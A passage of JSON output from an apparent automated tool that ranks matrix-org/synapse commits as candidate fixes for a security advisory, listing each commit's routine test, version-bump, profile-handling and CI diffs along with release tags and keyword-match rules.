"v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", + "relevance": 8 + } + ] + }, + { + "commit_id": "7eebe4b3fc3129e4571d58c3cea5eeccc584e072", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608043885, + "hunks": 22, + "message": "Replace `request.code` with `channel.code` The two are equivalent, but really we want to check the HTTP result that got returned to the channel, not the code that the Request object *intended* to return to the channel.", + "diff": [ + "diff --git a/tests/http/test_additional_resource.py b/tests/http/test_additional_resource.py", + "index 05e9c449b..adc318caa 100644", + "--- a/tests/http/test_additional_resource.py", + "+++ b/tests/http/test_additional_resource.py", + "@@ -50,3 +50,3 @@ class AdditionalResourceTests(HomeserverTestCase):", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + " self.assertEqual(channel.json_body, {\"some_key\": \"some_value_async\"})", + "@@ -59,3 +59,3 @@ class AdditionalResourceTests(HomeserverTestCase):", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + " self.assertEqual(channel.json_body, {\"some_key\": \"some_value_sync\"})", + "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", + "index fe9e4d5f9..aee839dc6 100644", + "--- a/tests/replication/test_auth.py", + "+++ b/tests/replication/test_auth.py", + "@@ -68,3 +68,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request_1.code, 401)", + "+ self.assertEqual(channel_1.code, 401)", + "@@ -86,3 +86,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " request, channel = self._test_register()", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + "@@ -96,3 +96,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " request, channel = self._test_register()", + "- self.assertEqual(request.code, 500)", + "+ self.assertEqual(channel.code, 500)", + "@@ -108,3 +108,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " request, channel = self._test_register()", + "- self.assertEqual(request.code, 500)", + "+ self.assertEqual(channel.code, 500)", + "@@ -115,3 +115,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " request, channel = self._test_register()", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", + "index fdaad3d8a..6cdf6a099 100644", + "--- a/tests/replication/test_client_reader_shard.py", + "+++ b/tests/replication/test_client_reader_shard.py", + "@@ -50,3 +50,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request_1.code, 401)", + "+ self.assertEqual(channel_1.code, 401)", + "@@ -63,3 +63,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request_2.code, 200)", + "+ self.assertEqual(channel_2.code, 200)", + "@@ -82,3 +82,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request_1.code, 401)", + "+ self.assertEqual(channel_1.code, 401)", + "@@ -96,3 +96,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request_2.code, 200)", + "+ self.assertEqual(channel_2.code, 200)", + "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", + "index 2ac1ecb7d..11a042f9e 100644", + "--- a/tests/rest/client/v2_alpha/test_account.py", + "+++ b/tests/rest/client/v2_alpha/test_account.py", + "@@ -355,3 +355,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", + " request, channel = self.make_request(\"GET\", \"account/whoami\")", + "- self.assertEqual(request.code, 401)", + "+ self.assertEqual(channel.code, 401)", + "@@ -412,3 +412,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", + " )", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", + "index ac67a9de2..a35c2646f 100644", + "--- a/tests/rest/client/v2_alpha/test_auth.py", + "+++ b/tests/rest/client/v2_alpha/test_auth.py", + "@@ -73,3 +73,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", + "- self.assertEqual(request.code, expected_response)", + "+ self.assertEqual(channel.code, expected_response)", + " return channel", + "@@ -86,3 +86,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", + " ) # type: SynapseRequest, FakeChannel", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + "@@ -94,3 +94,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", + " )", + "- self.assertEqual(request.code, expected_post_response)", + "+ self.assertEqual(channel.code, expected_post_response)", + "@@ -203,3 +203,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Ensure the response is sane.", + "- self.assertEqual(request.code, expected_response)", + "+ self.assertEqual(channel.code, expected_response)", + "@@ -216,3 +216,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Ensure the response is sane.", + "- self.assertEqual(request.code, expected_response)", + "+ self.assertEqual(channel.code, expected_response)", + "diff --git a/tests/rest/client/v2_alpha/test_register.py b/tests/rest/client/v2_alpha/test_register.py", + "index bcb21d0ce..4bf3e0d63 100644", + "--- a/tests/rest/client/v2_alpha/test_register.py", + "+++ b/tests/rest/client/v2_alpha/test_register.py", + "@@ -561,3 +561,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " )", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + "diff --git a/tests/rest/test_health.py b/tests/rest/test_health.py", + "index 02a46e5fd..aaf2fb821 100644", + "--- a/tests/rest/test_health.py", + "+++ b/tests/rest/test_health.py", + "@@ -29,3 +29,3 @@ class HealthCheckTests(unittest.HomeserverTestCase):", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + " self.assertEqual(channel.result[\"body\"], b\"OK\")", + "diff --git a/tests/rest/test_well_known.py b/tests/rest/test_well_known.py", + "index 6a930f414..17ded96b9 100644", + "--- a/tests/rest/test_well_known.py", + "+++ b/tests/rest/test_well_known.py", + "@@ -34,3 +34,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", + "- self.assertEqual(request.code, 200)", + "+ self.assertEqual(channel.code, 200)", + " self.assertEqual(", + "@@ -50,2 +50,2 @@ class WellKnownTests(unittest.HomeserverTestCase):", + "- self.assertEqual(request.code, 404)", + "+ self.assertEqual(channel.code, 404)" + ], + "changed_files": [ + "tests/http/test_additional_resource.py", + "tests/replication/test_auth.py", + "tests/replication/test_client_reader_shard.py", + "tests/rest/client/v2_alpha/test_account.py", + "tests/rest/client/v2_alpha/test_auth.py", + "tests/rest/client/v2_alpha/test_register.py", + "tests/rest/test_health.py", + "tests/rest/test_well_known.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: know, resource", + "relevance": 4 + } + ] + }, + { + "commit_id": "9b26a4ac87cead4846c5bada73927cc2a6353a90", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607510061, + "hunks": 3, + "message": "1.24.0", + "diff": [ + "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", + "deleted file mode 100644", + "index bdb0d40d5..000000000", + "--- a/changelog.d/8898.misc", + "+++ /dev/null", + "@@ -1 +0,0 @@", + "-Add a maximum version for pysaml2 on Python 3.5.", + "diff --git a/debian/changelog b/debian/changelog", + "index 4ea4feddd..9f47d12b7 100644", + "--- a/debian/changelog", + "+++ b/debian/changelog", + "@@ -1 +1,7 @@", + "+matrix-synapse-py3 (1.24.0) stable; urgency=medium", + "+", + "+ * New synapse release 1.24.0.", + "+", + "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:14:30 +0000", + "+", + " matrix-synapse-py3 (1.23.0) stable; urgency=medium", + "diff --git a/synapse/__init__.py b/synapse/__init__.py", + "index 2e354f2cc..f2d3ac68e 100644", + "--- a/synapse/__init__.py", + "+++ b/synapse/__init__.py", + "@@ -50,3 +50,3 @@ except ImportError:", + "-__version__ = \"1.24.0rc2\"", + "+__version__ = \"1.24.0\"" + ], + "changed_files": [ + "changelog.d/8898.misc", + "debian/changelog", + "synapse/__init__.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.24.0", + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", + "relevance": 8 + } + ] + }, + { + "commit_id": "5bcf6e8289b075ef298510faae12041811bbd344", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608044081, + "hunks": 2, + "message": "Skip redundant check on `request.args`", + "diff": [ + "diff --git a/tests/test_server.py b/tests/test_server.py", + "index 6b2d2f040..0be8c7e2f 100644", + "--- a/tests/test_server.py", + "+++ b/tests/test_server.py", + "@@ -66,3 +66,3 @@ class JsonResourceTests(unittest.TestCase):", + "- request, channel = make_request(", + "+ make_request(", + " self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo/%E2%98%83?a=%E2%98%83\"", + "@@ -70,3 +70,2 @@ class JsonResourceTests(unittest.TestCase):", + "- self.assertEqual(request.args, {b\"a\": [\"\\N{SNOWMAN}\".encode(\"utf8\")]})", + " self.assertEqual(got_kwargs, {\"room_id\": \"\\N{SNOWMAN}\"})" + ], + "changed_files": [ + "tests/test_server.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server", + "relevance": 4 + } + ] + }, + { + "commit_id": "e6797e004f4383ddbfc215c8ad8a61964d2ef2c6", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1606762769, + "hunks": 2, + "message": "Allow per-room profile to be used for server notice user (#8799) This applies even if the feature is disabled at the server level with `allow_per_room_profiles`. The server notice not being a real user it doesn't have an user profile.", + "diff": [ + "diff --git a/changelog.d/8799.bugfix b/changelog.d/8799.bugfix", + "new file mode 100644", + "index 000000000..a7e6b3556", + "--- /dev/null", + "+++ b/changelog.d/8799.bugfix", + "@@ -0,0 +1 @@", + "+Allow per-room profiles to be used for the server notice user.", + "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", + "index 5a8120db5..6af59b3f7 100644", + "--- a/synapse/handlers/room_member.py", + "+++ b/synapse/handlers/room_member.py", + "@@ -352,3 +352,11 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", + "- if not self.allow_per_room_profiles or requester.shadow_banned:", + "+ # allow the server notices mxid to set room-level profile", + "+ is_requester_server_notices_user = (", + "+ self._server_notices_mxid is not None", + "+ and requester.user.to_string() == self._server_notices_mxid", + "+ )", + "+", + "+ if (", + "+ not self.allow_per_room_profiles and not is_requester_server_notices_user", + "+ ) or requester.shadow_banned:", + " # Strip profile data, knowing that new profile data will be added to the" + ], + "changed_files": [ + "changelog.d/8799.bugfix", + "synapse/handlers/room_member.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8799": "" + }, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: server, file", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8799", + "relevance": 2 + } + ] + }, + { + "commit_id": "903bb990b953ec3393d30da81693e0e8bdc2d026", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607698058, + "hunks": 1, + "message": "Remove the CI requirement for newsfiles (#73) We don't use newsfiles for DINUM releases anyways, so a CI requirement for them does not make sense.", + "diff": [ + "diff --git a/.buildkite/pipeline.yml b/.buildkite/pipeline.yml", + "index 5877ff088..c3171c00c 100644", + "--- a/.buildkite/pipeline.yml", + "+++ b/.buildkite/pipeline.yml", + "@@ -31,13 +31,2 @@ steps:", + "- - label: \":newspaper: Newsfile\"", + "- command:", + "- - \"python -m pip install tox\"", + "- - \"scripts-dev/check-newsfragment\"", + "- branches: \"!master !develop !release-*\"", + "- plugins:", + "- - docker#v3.0.1:", + "- image: \"python:3.6\"", + "- propagate-environment: true", + "- mount-buildkite-agent: false", + "-", + " - label: \"\\U0001F9F9 check-sample-config\"" + ], + "changed_files": [ + ".buildkite/pipeline.yml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "73": "account_data returned by /_matrix/client/unstable/org.matrix.msc3575/sync are 